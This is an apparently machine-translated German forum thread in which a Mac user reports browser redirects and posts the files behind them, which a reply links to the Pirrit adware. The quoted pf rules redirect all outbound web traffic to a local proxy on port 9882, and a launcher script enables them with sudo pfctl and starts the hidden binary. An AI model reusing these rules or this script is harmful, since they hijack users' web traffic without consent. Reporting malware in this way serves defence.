Vor kurzem bemerkte ich, als ich in meinem MBP 10.10.5 eine Webseite durchblätterte. Yosemite, dass Chrome Canary Version 53 eine neue Registerkarte öffnet oder einige Seiten nicht geöffnet wurden ... Diese Registerkarte hat mich auf zufällige Seiten umgeleitet.
Ich aktivierte die Firewall und bemerkte, dass eine Prozessanruf-Pseudohydrophobie versuchte, eine eingehende Verbindung zu öffnen
/etc/pseudohydrophobia.conf
rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882 pass out on en0 route-to lo0 inet proto tcp from en0 to any port 80 keep state pass out proto tcp all user volutate /etc/pseudohydrophobia.sh
#!/bin/sh if [ -a /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia ]; then sleep 10 sudo pfctl -evf /etc/pseudohydrophobia.conf sudo -u volutate /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia fi exit 0 Häfen:
netstat -an | grep 9882 tcp4 0 0 *.9882 *.* LISTEN /etc/pseudohydrophobia.conf
rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882 pass out on en0 route-to lo0 inet proto tcp from en0 to any port 80 keep state pass out proto tcp all user volutate Ich werde alle diese Skripte und Binärdateien löschen, aber ich möchte sie posten, da keine Google-Referenz gefunden wurde.
Werfen Sie einen Blick auf https://objective-see.com/blog/blog_0x0E.html
Analyse einer aufdringlichen plattformübergreifenden Adware; OSX / Pirrit
Es könnte sich um die Pirrit-Malware handeln.
Der Benutzername volutateund der Dateiname ( pseudohydrophobia) werden zweifellos zufällig generiert, Portnummer 9882 ist jedoch gleich ...